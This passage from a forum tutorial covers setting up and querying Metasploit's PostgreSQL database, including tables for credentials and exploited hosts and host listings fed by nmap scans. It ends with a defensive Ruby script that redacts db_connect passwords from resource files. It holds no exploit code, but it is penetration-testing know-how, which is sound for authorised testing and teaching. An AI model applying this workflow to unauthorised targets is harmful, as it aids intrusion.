    NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"
    NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"
    NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"
    NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"
    NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"
    NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"
    NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"
    NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"
    NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"
    NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"
    NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"
    NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"
    NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"
    NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"
    NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"
    NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"
    NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"
    Next, I like to verify the status of the connection. If you are not creating a new database and are connecting to an existing one, it may be a good idea to see if you've left anything in it. Here's the example:
    Code:
    msf > db_status 
    [*] postgresql connected to db_autopwn
    msf > db_hosts 
    
    Hosts
    =====
    
    address  address6  arch  comm  comments  created_at  info  mac  name  os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at  svcs  vulns  workspace
    -------  --------  ----  ----  --------  ----------  ----  ---  ----  ---------  -------  -------  -----  -------  -----  ----------  ----  -----  ---------
    I like to clean up my output on db_hosts, as the nmap string I like to use for quick scans doesn't fill a number of the fields. Here's how.
    Code:
    msf > db_hosts -h
    Usage: db_hosts [-h|--help] [-u|--up] [-a <addr1,addr2>] [-c <column1,column2>] [-o output-file ]
    
      -a <addr1,addr2>  Search for a list of addresses
      -c <col1,col2>    Only show the given columns
      -h,--help         Show this help information
      -u,--up           Only show hosts which are up
      -o <file>         Send output to a file in csv format
    
    Available columns: address, address6, arch, comm, comments, created_at, info, mac, name, os_flavor, os_lang, os_name, os_sp, purpose, state, updated_at 
    
    msf > db_hosts -c address,mac,name,state,updated_at,svcs,vulns
    
    Hosts
    =====
    
    address  mac  name  state  updated_at  svcs  vulns
    -------  ---  ----  -----  ----------  ----  -----
    In the example above, there is nothing in the database. Entries can be added or otherwise manipulated manually with commands such as db_add_host, db_add_port, db_del_host, etc. Of course nmap is a much simpler way of populating your database. Right now we are just going to add an individual host with db_nmap, but you can certainly scan in a subnet instead.


    ...continues...
    Last edited by iproute; 11-18-2010 at 04:36 PM.
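    One thing to keep in mind when you combine this post with the makerc command from earlier in the thread: the db_connect line carries the database password in clear text (postgres:mypassword@127.0.0.1/db_autopwn above), and makerc saves every command executed since startup, so the password ends up in the resource file. The Ruby below is an added example written for this thread (not code from the original post or from the Metasploit project): it parses the db_connect connection string into its parts and scrubs the password out of a resource file before you hand it to a colleague or check it into a repo. It assumes the user:pass@host[:port]/database form shown in the post and in msfconsole's db_connect usage text, and a PostgreSQL default port of 5432 when none is given; the rc text is constructed.

```ruby
# Added example, not from the original post or the Metasploit project:
# parse db_connect connection strings and redact the password from
# resource files, since makerc writes db_connect lines verbatim.

# user:pass@host[:port]/database, the form shown in the post.
DB_CONNECT_RE = %r{^(?<prefix>\s*db_connect\s+)(?<user>[^:\s]+):(?<pass>[^@\s]*)@(?<host>[^:/\s]+)(?::(?<port>\d+))?/(?<db>\S+)\s*$}

# Returns a hash of the connection parts, or nil if the line is not a
# db_connect line in that form. Port defaults to 5432 (assumed PostgreSQL).
def parse_db_connect(line)
  m = DB_CONNECT_RE.match(line)
  return nil unless m
  { user: m[:user], password: m[:pass], host: m[:host],
    port: (m[:port] || '5432').to_i, database: m[:db] }
end

# Rewrite rc text so it can be shared: every db_connect password is replaced
# with <REDACTED>. Returns [redacted_text, findings], where findings says
# which lines carried a credential.
def redact_rc(text)
  findings = []
  out = text.each_line.with_index(1).map do |line, n|
    m = DB_CONNECT_RE.match(line)
    next line unless m
    findings << "line #{n}: db_connect carries a password for #{m[:user]}@#{m[:host]}"
    nl = line.end_with?("\n") ? "\n" : ''
    port = m[:port] ? ":#{m[:port]}" : ''
    "#{m[:prefix]}#{m[:user]}:<REDACTED>@#{m[:host]}#{port}/#{m[:db]}#{nl}"
  end.join
  [out, findings]
end

# Constructed resource file, in the style of what makerc would save after
# the commands shown in the post.
SAMPLE_DB_RC = <<~RC
  db_driver postgresql
  db_connect postgres:mypassword@127.0.0.1/db_autopwn
  db_status
  db_hosts -c address,mac,name,state,updated_at,svcs,vulns
RC

if __FILE__ == $0
  conn = parse_db_connect('db_connect postgres:mypassword@127.0.0.1/db_autopwn')
  puts "connecting as #{conn[:user]} to #{conn[:host]}:#{conn[:port]}/#{conn[:database]}"
  redacted, findings = redact_rc(SAMPLE_DB_RC)
  puts findings
  puts redacted
end
```

    The same check is worth running on any rc file before you share it, because the setg lines and the command history are exactly what makes resource files useful and also what makes them leak things you typed once and forgot about.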

